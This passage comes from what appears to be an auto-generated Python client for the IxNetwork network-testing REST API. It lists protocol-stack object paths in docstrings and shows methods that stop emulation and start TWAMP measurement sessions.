egtpS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/twampClient,/vport/protocolStack/atm/emulatedRouter/ip/twampServer,/vport/protocolStack/atm/emulatedRouter/ipEndpoint,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/ancp,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampServer,/vport/protocolStack/atm/emulatedRouterEndpoint,/vport/protocolStack/atm/emulatedRouterEndpoint/range/amtRange,/vport/protocolStack/atm/ip,/vport/protocolStack/atm/ip/ancp,/vport/protocolStack/atm/ip/egtpPcrfEndpoint,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tpEndpoint,/vport/protocolStack/atm/ip/l2tpEndpoint/range,/vport/protocolStack/atm/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/smDnsEndpoint,/vport/protocolStack/atm/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/twampClient,/vport/protocolStack/atm/ip/twampServer,/vport/protocolStack/atm/ipEndpoint,/vport/protocolStack/atm/ipEndpoint/ancp,/vport/protocolStack/atm/ipEndpoint/range/amtRange,/vport/protocolStack/atm/ipEndpoint/range/ancpRange,/vport/protocolStack/atm/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/ipEndpoint/twampClient,/vport/protocolStack/atm/ipEndpoint/twampServer,/vport/protocolStack/atm/pppox,/vport/protocolStack/atm/pppox/ancp,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/ancpRange,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/ancpRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/pppoxEndpoint,/vport/protocolStack/atm/pppoxEndpoint/ancp,/vport/protocolStack/atm/pppoxEndpoint/range,/vport/protocolStack/atm/pppoxEndpoint/range/ancpRange,/vport/protocolStack/atm/pppoxEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppoxEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet,/vport/protocolStack/ethernet/dcbxEndpoint,/vport/protocolStack/ethernet/dcbxEndpoint/range,/vport/protocolStack/ethernet/dhcpEndpoint,/vport/protocolStack/ethernet/dhcpEndpoint/ancp,/vport/protocolStack/ethernet/dhcpEndpoint/range,/vport/protocolStack/ethernet/dhcpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/dhcpServerEndpoint,/vport/protocolStack/ethernet/dhcpServerEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/ancp,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip,/vport/protocolStack/ethernet/emulatedRouter/ip/ancp,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ip/twampServer,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/ancp,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampServer,/vport/protocolStack/ethernet/emulatedRouterEndpoint,/vport/protocolStack/ethernet/emulatedRouterEndpoint/range/amtRange,/vport/protocolStack/ethernet/esmc,/vport/protocolStack/ethernet/fcoeClientEndpoint,/vport/protocolStack/ethernet/fcoeClientEndpoint/range,/vport/protocolStack/ethernet/fcoeClientEndpoint/range,/vport/protocolStack/ethernet/fcoeClientEndpoint/range/fcoeClientFdiscRange,/vport/protocolStack/ethernet/fcoeClientEndpoint/range/fcoeClientFlogiRange,/vport/protocolStack/ethernet/fcoeFwdEndpoint,/vport/protocolStack/ethernet/fcoeFwdEndpoint/range,/vport/protocolStack/ethernet/fcoeFwdEndpoint/secondaryRange,/vport/protocolStack/ethernet/ip,/vport/protocolStack/ethernet/ip/ancp,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/twampClient,/vport/protocolStack/ethernet/ip/twampServer,/vport/protocolStack/ethernet/ipEndpoint,/vport/protocolStack/ethernet/ipEndpoint/ancp,/vport/protocolStack/ethernet/ipEndpoint/range/amtRange,/vport/protocolStack/ethernet/ipEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ipEndpoint/twampClient,/vport/protocolStack/ethernet/ipEndpoint/twampServer,/vport/protocolStack/ethernet/pppox,/vport/protocolStack/ethernet/pppox/ancp,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/pppoxEndpoint,/vport/protocolStack/ethernet/pppoxEndpoint/ancp,/vport/protocolStack/ethernet/pppoxEndpoint/range,/vport/protocolStack/ethernet/pppoxEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppoxEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppoxEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/vepaEndpoint,/vport/protocolStack/ethernet/vepaEndpoint/range,/vport/protocolStack/ethernetEndpoint,/vport/protocolStack/ethernetEndpoint/esmc,/vport/protocolStack/fcClientEndpoint,/vport/protocolStack/fcClientEndpoint/range,/vport/protocolStack/fcClientEndpoint/range,/vport/protocolStack/fcClientEndpoint/range/fcClientFdiscRange,/vport/protocolStack/fcClientEndpoint/range/fcClientFlogiRange,/vport/protocolStack/fcFportFwdEndpoint,/vport/protocolStack/fcFportFwdEndpoint/range,/vport/protocolStack/fcFportFwdEndpoint/secondaryRange]
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stop', payload=payload, response_object=None)
def TwampStart(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the twampStart operation on the server.
Initiate TWAMP control and test sessions for selected ranges and start measurements
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
twampStart(async_operation=bool)
--------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
twampStart(Arg2=enum, async_operation=bool)
-------------------------------------------
- Arg2 (str(async | sync)): kArray[kObjref=/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/twampClient,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/twampClient,/vport/protocolStack/atm/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/ipEndpoint/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/twampClient,/vport/protocolStack/ethernet/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ipEndpoint/twampClient]
